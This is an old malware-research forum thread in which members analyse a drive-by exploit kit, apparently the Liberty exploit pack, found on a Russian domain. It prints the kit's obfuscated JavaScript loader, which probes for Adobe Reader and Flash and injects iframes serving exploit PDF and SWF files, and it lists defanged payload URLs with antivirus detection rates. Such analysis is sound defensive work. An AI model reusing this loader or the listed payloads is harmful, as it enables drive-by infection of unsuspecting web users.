Author Topic: pdf swf exploit in iframe  (Read 4472 times)

0 Members and 1 Guest are viewing this topic.

August 27, 2009, 06:44:47 pm
Read 4472 times

cleanmx

  • Special Members
  • Hero Member

  • Offline
  • *

  • 3405
    • Spam-Filter Anti-Spam Virenschutz - CLEAN MX Managed Anti-Spam Service ist die Lösung für Ihr Spam-Problem
no luck to decode this with malzilla...

Code: [Select]
http://franchjump.ru/lib/index.php
leads to:
Code: [Select]
<html><head></head><body><script>function qVkMn73vX(qVkMn73vX){return true;}var x0RUJqGCTF = new Array("PDF.PdfCtrl",
"AcroPDF.PDF", "ShockwaveFlash.ShockwaveFlash", "Adobe Acrobat", "Adobe PDF", "Flash");this.lpZBwtxYaW=13553;function
b7vOGuKPk(rhodih6xR){var lSQBVtKKX=false;var njJadnyF2 = document.createElement("iframe");var
vGTSfY3ftC='vGTSfY3ftC';njJadnyF2.setAttribute("src", rhodih6xR);var
ra2KsGcQ3="ra2KsGcQ3";njJadnyF2.setAttribute("width", 200);var fTdFvA65k=1511;njJadnyF2.setAttribute("height",
200);this.cE7Uzbow='cE7Uzbow';document.body.appendChild(njJadnyF2);this.f1ZyDcfNJ=16427;}this.lFGmhMmt9=false;if(navigator.userAgent.indexOf("MSIE")
!= -1){this.lFGmhMmt9=false;for(mMb5G2BC = 0; mMb5G2BC < 3; mMb5G2BC ++){try{mzF1gvC6I = new
ActiveXObject(x0RUJqGCTF[mMb5G2BC]);function wEmSDxNQh(){}if(mzF1gvC6I){function iw2iiIFYF(iw2iiIFYF){return
true;}switch(mMb5G2BC){case 0:case 1:b7vOGuKPk("belowTendSome.pdf");break;case 2:b7vOGuKPk("evilSOr.swf");break;}var
wLGLEXnXZ=27351;}else{var sEZtIAB6M="sEZtIAB6M";}}catch(e){ function sHpNQCBS6(sHpNQCBS6){return sHpNQCBS6;}
}}}else{this.tHPi7ocW4="tHPi7ocW4";for(w594UW3fa = 0; w594UW3fa <= navigator.plugins.length; w594UW3fa++){var a1VPNeZNR
= navigator.plugins[w594UW3fa].name;if((a1VPNeZNR.indexOf(x0RUJqGCTF[3]) != -1 || a1VPNeZNR.indexOf(x0RUJqGCTF[4]) !=
-1)) b7vOGuKPk("belowTendSome.pdf");if( a1VPNeZNR.indexOf(x0RUJqGCTF[5]) != -1 ) b7vOGuKPk("evilSOr.swf");}function
wJwuFMJm(wJwuFMJm){return true;}}this.rsmpJInjI='rsmpJInjI';var hhNE48RIR="hhNE48RIR";var
jPyi2a1aR="jPyi2a1aR";</script></body></html>

August 27, 2009, 07:01:02 pm
Reply #1

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Full source code for it attached (above is only partial code)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

August 27, 2009, 11:42:32 pm
Reply #2

RS-232

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 165
hxxp://franchjump.ru/lib/update.php?id=2
Result: 10/41 (24.4%)
http://www.virustotal.com/analisis/d35dbb8eb7cc043ccb7f92aabe8886785ad35adb54cc8c139bdee00ab8d89c50-1251416118

hxxp://franchjump.ru/lib/webThere.png
Result: 5/41 (12.2%)
http://www.virustotal.com/analisis/669db4a1fa13693720475125509f752fddc1c347eed7959dbbb74de6d4bb8785-1251416942

hxxp://franchjump.ru/lib/belowTendSome.pdf
Result: 6/41 (14.64%)
http://www.virustotal.com/analisis/5434abe05a5ae1114754176e7297839e96d2b9ebe8082e28c31a3d2944e1cbe5-1251415971

hxxp://franchjump.ru/lib/evilSOr.swf
Result: 2/41 (4.88%)
http://www.virustotal.com/analisis/640e72c3753dd90322fbb26728d44011e0041824ede84419474f19b5227b38b9-1251390004

This crap is UCS2 with a twist...now if only i was slightly better in regexp,but anyway...
a bit of google-fu revealed how to go about de-obfuscating this lameness:  :)
http://www.web2secure.com/2009/08/complex-obfuscated-js-code-in-pdf.html

Semi-decoded js crap in attachment below - nice ip address by the way,full of crappy domains...
http://www.bfk.de/bfk_dnslogger.html?query=211.95.78.98#result
Only for the "fun" of it...rs-232 aka sowhat-x aka younameit ;-)
http://www.youtube.com/watch?v=fADjY97_KTw

August 28, 2009, 11:51:57 am
Reply #3

RS-232

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 165
From the same ip (and not already spotted in the list,as most of the aformentioned domains are)...

hxxp://uploadfilefree.ru/cc.exe
Result: 2/41 (4.88%):
http://www.virustotal.com/analisis/42fdb8be709abed7a12a8c76e9e4ff5b85a54c659862c59a25b2f09baebef0df-1251460092
Only for the "fun" of it...rs-232 aka sowhat-x aka younameit ;-)
http://www.youtube.com/watch?v=fADjY97_KTw

August 28, 2009, 12:13:37 pm
Reply #4

WIEx

  • Jr. Member

  • Offline
  • **

  • 34
    • Security
this is a Liberty Exploit

August 28, 2009, 12:20:23 pm
Reply #5

RS-232

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 165
Quote
this is a Liberty Exploit
...nothing really special in it in my personal view (at least when compared to the rest of exploit packs),
except maybe from the Exploit.JS.DirektShow in the 'webThere.png' mentioned above...
Only for the "fun" of it...rs-232 aka sowhat-x aka younameit ;-)
http://www.youtube.com/watch?v=fADjY97_KTw